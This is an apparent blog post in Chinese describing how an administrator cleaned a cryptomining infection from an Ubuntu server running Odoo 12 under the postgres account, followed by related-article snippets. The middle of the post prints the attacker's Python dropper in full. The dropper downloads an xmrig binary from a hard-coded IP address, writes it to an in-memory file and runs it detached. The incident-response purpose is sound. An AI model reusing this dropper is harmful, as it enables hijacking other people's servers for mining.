服务器异常 随机名称的进程CPU资源占用过高
操作系统: Ubuntu 16.04
之前部署完odoo12后就经常出现服务挂掉的情况,查看状态一般都是某某包缺失,然后各种安装包,重启服务,这次发现CPU占用达到399%,而且每次进程名称都是随机的,通过postgres用户执行,遂怀疑之前安装包的时候装了什么不好的东西,通过以下步骤排查:
1. 通过top命令查看进程
发现PID为2981的进程异常
2. 通过在进程目录下找执行的程序:
cd /cd/proc/2981 sudo ls -l exe
定位到执行文件所在目录/var/lib/postgressql
3. 定位到执行文件后,切换到执行文件所在目录删除可疑文件
cd /var/lib/postgresql
ls -la
一下就看到有若干可疑脚本文件和文件夹,将.ssh、.systemd-init、.bash_history都删除了。
4. kill异常进程
kill -9 2981
然后再使用top命令查看进程
世界暂时安静了。
后续:观察了一小会,发现问题依旧,又出了一个新进程占CPU399%了,于是继续排查。
1. 通过对异常进程定位,发现还是在之前的目录,但进入到目录,发现之前被删除的文件没有再出现,于是进入到子目录内查找,在以下目录发现新问题
首先,映入眼帘的是go.py文件,这太明显了,于是打开该文件,内容如下:
import os import sys import ctypes import hashlib import urllib2 import platformdef run_miner(binary):fd = ctypes.CDLL(None).syscall(319, "", 1)final_fd = open('/proc/self/fd/' + str(fd), 'wb')final_fd.write(binary)final_fd.close()fork1 = os.fork()print os.getpid()if 0 != fork1:os._exit(0)ctypes.CDLL(None).syscall(112)fork2 = os.fork()if 0 != fork2:os._exit(0)os.execl('/proc/self/fd/' + str(fd), '', '')def load_miner(url):try:response = urllib2.urlopen(url)binary = response.read()except:return Nonereturn binarydef get_sysinfo():_arch = ctypes.sizeof(ctypes.c_void_p) * 8if _arch is 64:_arch = 64elif _arch is 32:_arch = 32else:return Falsekernel_name = platform.system()if "linux" in kernel_name:_os_name = "linux"elif "win" in kernel_name:_os_name = "win"else:return Falsereturn _os_name, _archdef get_md5(binary):return hashlib.md5(binary).hexdigest()if __name__ == "__main__":os_name, arch = get_sysinfo()if os_name != "linux":sys.exit(0)miner_url = "http://185.193.125.38:8000/cyka/xmrig-" + archminer_md5 = ["fd4e61e02958b57b8446325b62efa1ea", "616b7f7f9a061fd8a90c83467e7139e0"]miner_max_retry = 10_dl_count = 1while True:miner_bin = load_miner(miner_url)if get_md5(miner_bin) in miner_md5 or miner_max_retry < _dl_count:break_dl_count = _dl_count + 1try:run_miner(miner_bin)except:pass
很明了了,应该就是它,删除该文件,然后kill掉异常进程,继续观察,一会后,问题依旧!!!!!
继续排查,还是在原来的目录下发现一个可执行文件,如下
这是可疑文件,删除之,欸,没任何反应。。。
rm -rf 删了没反应!!!
文件还是在!!!
怎么办???
没权限??
chmod赋个777
见鬼!
看着那个绿色的postgresq1眉头紧蹙,捶胸顿足,木有办法呢
十分钟过去了
二十分钟过去了
灵光一现,那后面不是l是1啊,这名字太好了,于是直接:
rm -rf postgresq1
删掉了!!!!!!!
赶紧kill异常进程,再观察,这次应该没问题了。
再次后续。问题又来了!!!!!
若干时间后问题再现了,该删的都删了,还是能自动执行,查看了crontab任务、自启动项,都没有收获,几乎想放弃了,想到对方使用postgres账户执行,遂设置postgres账户密码,使用较强密码,然后再kill异常进程,过去40分钟了,这次没有再看到新的进程,谢天谢地!
转载于:https://www.cnblogs.com/lnkDel/p/11553741.html
服务器异常 随机名称的进程CPU资源占用过高相关推荐
- 关于使用WindowsUpdate 或 Windows 自动升级时碰到的 svchost.exe 进程 CPU 资源占用过高的问题的相关信息...
当你使用 WindowsUpdate 或 Windows 自动升级的时候,可能会碰到 svchost.exe 进程CPU占用100%的现象.如果你的现象符合下面的相关症状,请安装一个补丁程序用于缓解这 ...
- java接口经常变动前端怎么办_Java进程故障排查(CPU资源占用高,接口响应超时,功能接口停滞等)...
故障分析 # 导致系统不可用情况(频率较大): 1)代码中某个位置读取数据量较大,导致系统内存耗尽,进而出现Full GC次数过多,系统缓慢: 2)代码中有比较消耗CPU的操作,导致CPU过高,系统运 ...
- CPU负载占用过高,该如何排查问题呢?
快过年了,最后两天的工作量相对来说少了很多,于是抽空学了一下Linux相关的基础命令. 才子白问:学了啥子东西,分享一下呗! 成子:学了基础的Linux命令,跟你分享,你听得懂嘛? 才子白:那我考考你 ...
- [组图教程]:8大方法!解决CPU资源占用100%[ZT]
第1页:CPU资源占用100%:看驱动,看启动,看病毒 相信你的一定遇到过电脑动弹不得的时候,或许是只能眼看鼠标滑动而不能进行任何操作的时候,很多人都会经常遇到这样的问题:CPU占用率100 ...
- 9.7 top:实时显示系统中各个进程的资源占用状况
top命令 用于实时地对系统处理器状态进行监控,它能够实时地显示系统中各个进程的资源占用状况.该命令可以按照CPU的使用.内存的使用和执行时间对系统任务进程进行排序显示,同时top命令还可以通过交互式 ...
- linux进程占用的资源,Linux查看进程的资源占用情况
相关命令:who/w/ps/top 转载自:http://www.51testing.com/html/32/n-823532.html 1.top top命令是Linux下常用的性能分析工具,能够实 ...
- mysql 资源占用过高分析和解决方法
mysql 资源占用过高分析和解决方法 参考文章: (1)mysql 资源占用过高分析和解决方法 (2)https://www.cnblogs.com/luoa/p/10422210.html 备忘一 ...
- lum使用cgi处理PHP,php-cgi进程占用cpu资源过多负载高的原因分析及解决步骤
服务器环境:redhat linux 5.5 , nginx , phpfastcgi 在此环境下,一般php-cgi运行是非常稳定的,但也遇到过php-cgi占用太多cpu资源而导致服务器响应过慢 ...
- 服务器中木马病毒处理(CPU占用率很高)处理办法
参考:https://blog.csdn.net/wkfyynh/article/details/105206990 记录一下这个过程,方便后来人使用.如果遇到权限问题,在所有执行命令前使用sudo ...
最新文章
- Python开发技巧:scrapy-redis爬虫如何发送POST请求
- CH - 0502 七夕祭(思维+中位数优化+前缀和优化)
- ruby中exec,system,%x的区别
- C++ 传递字符串数组给函数参数
- Leecode刷题热题HOT100(17)——电话号码的字母组合
- NodeJs开发框架fortjs
- Java中udp/tcp的发送和接收
- GitHub标星7700:Python从新手到大师,只要100天
- 深度学习2.0-9.tensorflow的高阶操作之填充与复制
- 软件工程--螺旋模型详解
- python 英语分词_Python实现中英文分词
- 服务器抓不到mrcp协议,MRCP协议
- verilog的时钟分频与时钟使能
- 树莓派2使用360wifi ,小米wifi
- 希尔顿逸林品牌聚焦亚太市场,推进全球扩张式发展
- 大前端CPU优化技术--NEON intrinsics进阶
- 帮做Java_代写Heuristics、代做SAT、代写Java语言设计、代做Java代做Prolog|帮做Haskell程序...
- windows环境下anaconda-navigaotr出现adding featured channels一直打不开的情况
- 封闭式基金周折价率排行表20061013(ZT)
- Linux手机蓝牙互传,Ubuntu和手机通过蓝牙互传文件[zt]